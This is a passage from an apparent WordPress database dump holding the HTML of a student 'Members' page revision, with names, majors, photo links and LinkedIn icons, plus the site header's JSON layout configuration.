0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c168-outer\">\n            <div data-colibri-id=\"182-c168\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c168 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c169\" class=\"d-block style-913 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c169-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c169-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"h-global-transition-all h-heading style-914 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c170\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c171\" class=\"h-text h-text-component style-915 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"style-917 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c173-outer\">\n            <div data-colibri-id=\"182-c173\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c173 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c174\" class=\"d-block style-913 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c174-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c174-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"h-global-transition-all h-heading style-914 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c175\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c176\" class=\"h-text h-text-component style-915 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"style-917 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c178-outer\">\n            <div data-colibri-id=\"182-c178\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c178 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c179\" class=\"d-block style-913 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c179-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c179-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"h-global-transition-all h-heading style-914 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c180\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c181\" class=\"h-text h-text-component style-915 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c182-outer\">\n            <div data-colibri-id=\"182-c182\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c182 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c183\" class=\"d-block style-913 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c183-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c183-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-global-transition-all h-heading style-914 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c184\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"h-text h-text-component style-915 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c186\" class=\"style-917 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c187-outer\">\n            <div data-colibri-id=\"182-c187\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c187 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c188\" class=\"d-block style-913 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c188-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c188-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-global-transition-all h-heading style-914 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c189\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"h-text h-text-component style-915 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c191\" class=\"style-917 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-12 15:14:37','2023-10-12 19:14:37','',182,'https://gsudice.dataconn.net/?p=1638',0,'revision','',0),(1639,1,'2023-10-12 15:14:37','2023-10-12 19:14:37','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"